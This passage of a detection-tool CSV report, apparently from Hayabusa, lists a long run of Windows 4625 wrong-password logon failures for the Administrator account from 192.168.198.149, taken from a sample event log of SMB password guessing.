NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n90F99qBpmUUVLId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MLeOkIG0hVHIOnN7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vVx5uUtkaFIf7PWZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kgd7lCQUQ3dHN18S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b8m2MmpFVK9Uojp7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F0NZjeu3lb5xddVQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YjjXBZnyWt0ljzpv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sinFBozyUR0sBadM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Au22Y0LIuvTmZDpy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QDWW3VfZ7rKayV2v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zPgaFDZtc5wEupnq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TpYZc2TTDfJFnPHo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rYKkl1iHImW9NwKv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KxA2dh1iUMaMWOkA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sCzEzW8jDZGGZcpd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p8510u5OsCVd94I5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2a0whHngnv7o1Bz2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xy6cGuYgubjlXoMw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: luoXLN2XZQC0lHfu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8jdKLW96haKCHHXI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9SQSH6E1aKXu1o7T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nOUdKa838wK1mLFw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aFmILxspIJsiEHwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCz7qbdSEyqxQSKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ny3F1xPgakJK0CA7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vi7Moaa6d12CzWhl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fbbRVOig9bn9p5g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qSZrfRe9d0LLkbmA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QqdZMYsbXFlrKFxk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kypdxj88trEUBEny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9hM8fge1IrNsJNd2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SzG27JSj6iAFyiNT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hWcjuW8dU5ATLHzB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ns9lm9Nvhvi4fY6A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aExdYPqY2eUCYZmC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t9cnmRGdByuJlKZj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f9RvWTFFUgCrhlkD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HC3oQUIEWqztyx6s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TK3BOeD2w9xPB4N1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6yzU5WuvpmPKLSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GFoUGsara5Pl03WP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qLaOCImeMIMlGvMj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Vzb3pEI2ZeP2NFA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Fa7ebH7UXd1KW4X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wRBHXRkOa6x5KI5G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VNVxzgOLrZzfP3cB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yCNXajRX2lIgLQuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x0nukf24IoalycOn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xZFZN0KfeHtyDppG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZmxqKyWU5GU1y22P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WuRyvCfgQ4rwG3fu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3prKZt5ymouwNKnK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CWrNNn13EC1FLwLA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SfnBT5OvT5cQXHfS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RLZFPCShXoPvvThS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UsPCJ0UlfH4urYrm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MIQlOetFByLZqPkT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c9IBZ0qTDlHWADZt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lmhkB39gKvvuT89e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4KPoZ8JB7WSjUCHW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0mwiPq4gF1YXkQSl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y5ncgrpwOFo7E8vg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KbkG8ezrAPFC0iKu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GW4WKkHocNadDzrb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: unbtFAiykcfKTbQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oRzF1s9XVoRmoFQ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9TO1c7eYd1IQHVwG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wsn5GM4BqEl6A6pY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pq350wqwVDQlTKu9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uMJWwjG7J2sOiBYd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3YusfxQQygi2x5Cu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6q29uj6ovfwz0riC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cj38VsqGLoQ8jGdf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TOW8OIO2vQRFaTID | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DfYITdZCYwEj9IJV | IP Addr: 192.168.198.149 | AuthPackage: 